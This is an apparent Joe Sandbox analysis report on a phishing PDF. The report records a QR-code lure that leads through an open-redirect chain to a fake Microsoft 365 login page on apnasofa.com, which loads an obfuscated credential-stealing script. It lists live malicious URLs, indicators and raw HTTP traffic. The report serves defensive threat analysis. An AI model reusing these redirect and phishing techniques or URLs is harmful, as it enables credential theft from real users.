Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
Employee_Important_Message.pdf

Overview

General Information

Sample name:Employee_Important_Message.pdf
Analysis ID:1567650
MD5:950260bcf22db937f005ed57242d5d2f
SHA1:a3ac54b95eb2259b1612b46916dc727c7ae69973
SHA256:1db8985559d0fee589db38344a26999f62c081cc6e1982095dbe0c7e860c0b15
Infos:

Detection

HTMLPhisher
Score:72
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

AI detected phishing page
Antivirus detection for URL or domain
Yara detected HtmlPhish78
AI detected landing page (webpage, office document or email)
AI detected suspicious Javascript
Detected suspicious crossdomain redirect
HTML body contains low number of good links
HTML title does not match URL
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware

Classification

  • System is w10x64
  • Acrobat.exe (PID: 7492 cmdline: "C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe" "C:\Users\user\Desktop\Employee_Important_Message.pdf" MD5: 24EAD1C46A47022347DC0F05F6EFBB8C)
    • AcroCEF.exe (PID: 7676 cmdline: "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --backgroundcolor=16777215 MD5: 9B38E8E8B6DD9622D24B53E095C5D9BE)
      • AcroCEF.exe (PID: 7884 cmdline: "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --log-severity=disable --user-agent-product="ReaderServices/23.6.20320 Chrome/105.0.0.0" --lang=en-US --user-data-dir="C:\Users\user\AppData\Local\CEF\User Data" --log-file="C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\debug.log" --mojo-platform-channel-handle=2088 --field-trial-handle=1640,i,14083476496902513719,8648232596601135647,131072 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,WinUseBrowserSpellChecker /prefetch:8 MD5: 9B38E8E8B6DD9622D24B53E095C5D9BE)
  • chrome.exe (PID: 3548 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://google.lk/url?q=smurphy@american-usa.com&american-usa.com&sa=t&url=amp/s/i--iy.s3.us-east-1.amazonaws.com/vocabulary.html#c211cnBoeUBhbWVyaWNhbi11c2EuY29t MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
    • chrome.exe (PID: 8260 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2376 --field-trial-handle=2156,i,4777409756344785431,10372266608452722873,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
  • cleanup
No configs have been found
SourceRuleDescriptionAuthorStrings
dropped/chromecache_179JoeSecurity_HtmlPhish_78Yara detected HtmlPhish_78Joe Security
    dropped/chromecache_176JoeSecurity_HtmlPhish_78Yara detected HtmlPhish_78Joe Security
      SourceRuleDescriptionAuthorStrings
      1.1..script.csvJoeSecurity_HtmlPhish_78Yara detected HtmlPhish_78Joe Security
        No Sigma rule has matched
        No Suricata rule has matched

        Click to jump to signature section

        Show All Signature Results

        AV Detection

        barindex
        Source: https://apnasofa.com/episode/index#c211cnBoeUBhbWVyaWNhbi11c2EuY29tSlashNext: Label: Credential Stealing type: Phishing & Social Engineering
        Source: https://apnasofa.com/episode/script.jsAvira URL Cloud: Label: malware
        Source: https://apnasofa.com/episode/index#Avira URL Cloud: Label: malware
        Source: https://apnasofa.com/episode/image/logo.pngAvira URL Cloud: Label: malware
        Source: https://apnasofa.com/favicon.icoAvira URL Cloud: Label: malware
        Source: https://apnasofa.com/episode/style.cssAvira URL Cloud: Label: malware
        Source: https://apnasofa.com/episode/indexAvira URL Cloud: Label: malware

        Phishing

        barindex
        Source: https://apnasofa.com/episode/index#c211cnBoeUBhbWVyaWNhbi11c2EuY29tJoe Sandbox AI: Score: 7 Reasons: The brand 'Microsoft 365' is well-known and typically associated with the domain 'microsoft.com'., The URL 'apnasofa.com' does not match the legitimate domain for Microsoft 365., The domain 'apnasofa.com' does not have any apparent connection to Microsoft or its services., The presence of a generic or unrelated domain name is a common indicator of phishing., The input field '9fgirv@cmtja.org' does not provide any additional context to suggest legitimacy. DOM: 1.0.pages.csv
        Source: https://apnasofa.com/episode/index#c211cnBoeUBhbWVyaWNhbi11c2EuY29tJoe Sandbox AI: Score: 7 Reasons: The brand 'Microsoft 365' is well-known and typically associated with the domain 'microsoft.com'., The URL 'apnasofa.com' does not match the legitimate domain for Microsoft 365., The domain 'apnasofa.com' does not have any apparent connection to Microsoft or its services., The presence of an email input field with a non-Microsoft domain (cmtja.org) is suspicious and not typical for Microsoft 365 services., The URL does not contain any recognizable elements related to Microsoft, which is a red flag for phishing. DOM: 1.1.pages.csv
        Source: Yara matchFile source: 1.1..script.csv, type: HTML
        Source: Yara matchFile source: dropped/chromecache_179, type: DROPPED
        Source: Yara matchFile source: dropped/chromecache_176, type: DROPPED
        Source: PDF documentJoe Sandbox AI: PDF document contains QR code
        Source: https://apnasofa.com/episode/index#c211cnBoeUBhbWVyaWNhbi11c2EuY29tJoe Sandbox AI: Page contains button: 'Verify' Source: '1.0.pages.csv'
        Source: https://apnasofa.com/episode/index#c211cnBoeUBhbWVyaWNhbi11c2EuY29tJoe Sandbox AI: Page contains button: 'Verify' Source: '1.1.pages.csv'
        Source: 1.1..script.csvJoe Sandbox AI: Detected suspicious JavaScript with source url: https://apnasofa.com/episode/script.js...High-risk script detected: Uses atob() for obfuscation (+3), contains a large encoded payload (+3), includes a hardcoded 'secretkey' which might be used for malicious decryption (+1), and the length/complexity of encoded data suggests potential malware payload (+1). The obfuscation technique is commonly used to hide malicious code.
        Source: https://apnasofa.com/episode/index#c211cnBoeUBhbWVyaWNhbi11c2EuY29tHTTP Parser: Number of links: 0
        Source: https://apnasofa.com/episode/index#c211cnBoeUBhbWVyaWNhbi11c2EuY29tHTTP Parser: Title: pleased does not match URL
        Source: https://apnasofa.com/episode/index#c211cnBoeUBhbWVyaWNhbi11c2EuY29tHTTP Parser: No favicon
        Source: https://apnasofa.com/episode/index#c211cnBoeUBhbWVyaWNhbi11c2EuY29tHTTP Parser: No favicon
        Source: https://apnasofa.com/episode/index#c211cnBoeUBhbWVyaWNhbi11c2EuY29tHTTP Parser: No <meta name="author".. found
        Source: https://apnasofa.com/episode/index#c211cnBoeUBhbWVyaWNhbi11c2EuY29tHTTP Parser: No <meta name="author".. found
        Source: https://apnasofa.com/episode/index#c211cnBoeUBhbWVyaWNhbi11c2EuY29tHTTP Parser: No <meta name="copyright".. found
        Source: https://apnasofa.com/episode/index#c211cnBoeUBhbWVyaWNhbi11c2EuY29tHTTP Parser: No <meta name="copyright".. found
        Source: unknownHTTPS traffic detected: 23.218.208.109:443 -> 192.168.2.4:49746 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 23.218.208.109:443 -> 192.168.2.4:49750 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 20.109.210.53:443 -> 192.168.2.4:49756 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 20.109.210.53:443 -> 192.168.2.4:49774 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 13.107.246.63:443 -> 192.168.2.4:49775 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 13.107.246.63:443 -> 192.168.2.4:49986 version: TLS 1.2
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeHTTP traffic: Redirect from: www.google.lk to https://i--iy.s3.us-east-1.amazonaws.com/vocabulary.html
        Source: Joe Sandbox ViewIP Address: 104.26.12.205 104.26.12.205
        Source: Joe Sandbox ViewIP Address: 104.26.12.205 104.26.12.205
        Source: Joe Sandbox ViewIP Address: 103.160.107.138 103.160.107.138
        Source: Joe Sandbox ViewIP Address: 239.255.255.250 239.255.255.250
        Source: Joe Sandbox ViewJA3 fingerprint: 28a2c9bd18a11de089ef85a160da29e4
        Source: unknownTCP traffic detected without corresponding DNS query: 173.222.162.32
        Source: unknownTCP traffic detected without corresponding DNS query: 23.218.208.109
        Source: unknownTCP traffic detected without corresponding DNS query: 23.218.208.109
        Source: unknownTCP traffic detected without corresponding DNS query: 23.218.208.109
        Source: unknownTCP traffic detected without corresponding DNS query: 23.218.208.109
        Source: unknownTCP traffic detected without corresponding DNS query: 23.218.208.109
        Source: unknownTCP traffic detected without corresponding DNS query: 23.218.208.109
        Source: unknownTCP traffic detected without corresponding DNS query: 23.218.208.109
        Source: unknownTCP traffic detected without corresponding DNS query: 23.218.208.109
        Source: unknownTCP traffic detected without corresponding DNS query: 23.218.208.109
        Source: unknownTCP traffic detected without corresponding DNS query: 23.218.208.109
        Source: unknownTCP traffic detected without corresponding DNS query: 23.218.208.109
        Source: unknownTCP traffic detected without corresponding DNS query: 23.218.208.109
        Source: unknownTCP traffic detected without corresponding DNS query: 23.218.208.109
        Source: unknownTCP traffic detected without corresponding DNS query: 23.218.208.109
        Source: unknownTCP traffic detected without corresponding DNS query: 23.218.208.109
        Source: unknownTCP traffic detected without corresponding DNS query: 23.218.208.109
        Source: unknownTCP traffic detected without corresponding DNS query: 23.218.208.109
        Source: unknownTCP traffic detected without corresponding DNS query: 23.218.208.109
        Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.63
        Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.63
        Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.63
        Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.63
        Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.63
        Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.63
        Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.63
        Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.63
        Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.63
        Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.63
        Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.63
        Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.63
        Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.63
        Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.63
        Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.63
        Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.63
        Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.63
        Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.63
        Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.63
        Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.63
        Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.63
        Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.63
        Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.63
        Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.63
        Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.63
        Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.63
        Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.63
        Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.63
        Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.63
        Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.63
        Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.63
        Source: global trafficHTTP traffic detected: GET /url?q=smurphy@american-usa.com&american-usa.com&sa=t&url=amp/s/i--iy.s3.us-east-1.amazonaws.com/vocabulary.html HTTP/1.1Host: google.lkConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7X-Client-Data: CKq1yQEIi7bJAQiktskBCKmdygEIoOHKAQiTocsBCJz+zAEIhaDNAQjcvc0BCLnKzQEIotHNAQiK080BCJ7WzQEIp9jNAQj5wNQVGPbJzQEYutLNARjrjaUXSec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
        Source: global trafficHTTP traffic detected: GET /url?q=smurphy@american-usa.com&american-usa.com=&sa=t&url=amp/s/i--iy.s3.us-east-1.amazonaws.com/vocabulary.html HTTP/1.1Host: www.google.lkConnection: keep-aliveUpgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7X-Client-Data: CKq1yQEIi7bJAQiktskBCKmdygEIoOHKAQiTocsBCJz+zAEIhaDNAQjcvc0BCLnKzQEIotHNAQiK080BCJ7WzQEIp9jNAQj5wNQVGPbJzQEYutLNARjrjaUXSec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentsec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
        Source: global trafficHTTP traffic detected: GET /fs/windows/config.json HTTP/1.1Connection: Keep-AliveAccept: */*Accept-Encoding: identityIf-Unmodified-Since: Tue, 16 May 2017 22:58:00 GMTRange: bytes=0-2147483646User-Agent: Microsoft BITS/7.8Host: fs.microsoft.com
        Source: global trafficHTTP traffic detected: GET /amp/s/i--iy.s3.us-east-1.amazonaws.com/vocabulary.html HTTP/1.1Host: www.google.lkConnection: keep-aliveUpgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7X-Client-Data: CKq1yQEIi7bJAQiktskBCKmdygEIoOHKAQiTocsBCJz+zAEIhaDNAQjcvc0BCLnKzQEIotHNAQiK080BCJ7WzQEIp9jNAQj5wNQVGPbJzQEYutLNARjrjaUXSec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentsec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: NID=519=eWcWtT-Eo0l2hSn0eZjBbQfUACvxSEJXSFMWZySD3Hu3qK1rAD_jcuoN4m8X5FsCdJnMQtoonFfeBT7XgiS7xzUAvIWPh9xzftJfadE1-s7kUwr6D8ArZ8ADvY7nxCI6aRi_liRWEksWZGvA252OchYxeeaY0oKPZHI0zyFJPs0rfhsRWPNLm7IVlqAY1wpXgu7Rwg
        Source: global trafficHTTP traffic detected: GET /vocabulary.html HTTP/1.1Host: i--iy.s3.us-east-1.amazonaws.comConnection: keep-aliveUpgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentsec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
        Source: global trafficHTTP traffic detected: GET /SLS/%7B522D76A4-93E1-47F8-B8CE-07C937AD1A1E%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=7Ykm4fASykGa2oz&MD=Wv9kBFLN HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33Host: slscr.update.microsoft.com
        Source: global trafficHTTP traffic detected: GET /episode/index HTTP/1.1Host: apnasofa.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: cross-siteSec-Fetch-Mode: navigateSec-Fetch-Dest: documentReferer: https://i--iy.s3.us-east-1.amazonaws.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
        Source: global trafficHTTP traffic detected: GET /episode/style.css HTTP/1.1Host: apnasofa.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/css,*/*;q=0.1Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://apnasofa.com/episode/indexAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
        Source: global trafficHTTP traffic detected: GET /episode/image/logo.png HTTP/1.1Host: apnasofa.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://apnasofa.com/episode/indexAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
        Source: global trafficHTTP traffic detected: GET /episode/script.js HTTP/1.1Host: apnasofa.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://apnasofa.com/episode/indexAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
        Source: global trafficHTTP traffic detected: GET /?format=json HTTP/1.1Host: api.ipify.orgConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Origin: https://apnasofa.comSec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://apnasofa.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
        Source: global trafficHTTP traffic detected: GET /episode/script.js HTTP/1.1Host: apnasofa.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
        Source: global trafficHTTP traffic detected: GET /favicon.ico HTTP/1.1Host: apnasofa.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://apnasofa.com/episode/indexAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
        Source: global trafficHTTP traffic detected: GET /episode/image/logo.png HTTP/1.1Host: apnasofa.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
        Source: global trafficHTTP traffic detected: GET /?format=json HTTP/1.1Host: api.ipify.orgConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
        Source: global trafficHTTP traffic detected: GET /json/8.46.123.228 HTTP/1.1Host: ipwhois.appConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Origin: https://apnasofa.comSec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://apnasofa.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
        Source: global trafficHTTP traffic detected: GET /json/8.46.123.228 HTTP/1.1Host: ipwhois.appConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
        Source: global trafficHTTP traffic detected: GET /SLS/%7BE7A50285-D08D-499D-9FF8-180FDC2332BC%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=7Ykm4fASykGa2oz&MD=Wv9kBFLN HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33Host: slscr.update.microsoft.com
        Source: global trafficHTTP traffic detected: GET /rules/other-Win32-v19.bundle HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
        Source: global trafficHTTP traffic detected: GET /rules/rule120608v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
        Source: global trafficHTTP traffic detected: GET /rules/rule224902v2s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
        Source: global trafficHTTP traffic detected: GET /rules/rule120609v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
        Source: global trafficHTTP traffic detected: GET /rules/rule120402v21s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
        Source: global trafficHTTP traffic detected: GET /rules/rule120600v4s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
        Source: global trafficHTTP traffic detected: GET /rules/rule120610v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
        Source: global trafficHTTP traffic detected: GET /rules/rule120611v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
        Source: global trafficHTTP traffic detected: GET /rules/rule120613v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
        Source: global trafficHTTP traffic detected: GET /rules/rule120612v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
        Source: global trafficHTTP traffic detected: GET /rules/rule120614v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
        Source: global trafficHTTP traffic detected: GET /rules/rule120616v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
        Source: global trafficHTTP traffic detected: GET /rules/rule120615v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
        Source: global trafficHTTP traffic detected: GET /rules/rule120617v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
        Source: global trafficHTTP traffic detected: GET /rules/rule120618v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
        Source: global trafficHTTP traffic detected: GET /rules/rule120619v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
        Source: global trafficHTTP traffic detected: GET /rules/rule120620v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
        Source: global trafficHTTP traffic detected: GET /rules/rule120622v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
        Source: global trafficHTTP traffic detected: GET /rules/rule120623v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
        Source: global trafficHTTP traffic detected: GET /rules/rule120621v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
        Source: global trafficHTTP traffic detected: GET /rules/rule120624v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
        Source: global trafficHTTP traffic detected: GET /rules/rule120625v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
        Source: global trafficHTTP traffic detected: GET /rules/rule120626v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
        Source: global trafficHTTP traffic detected: GET /rules/rule120628v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
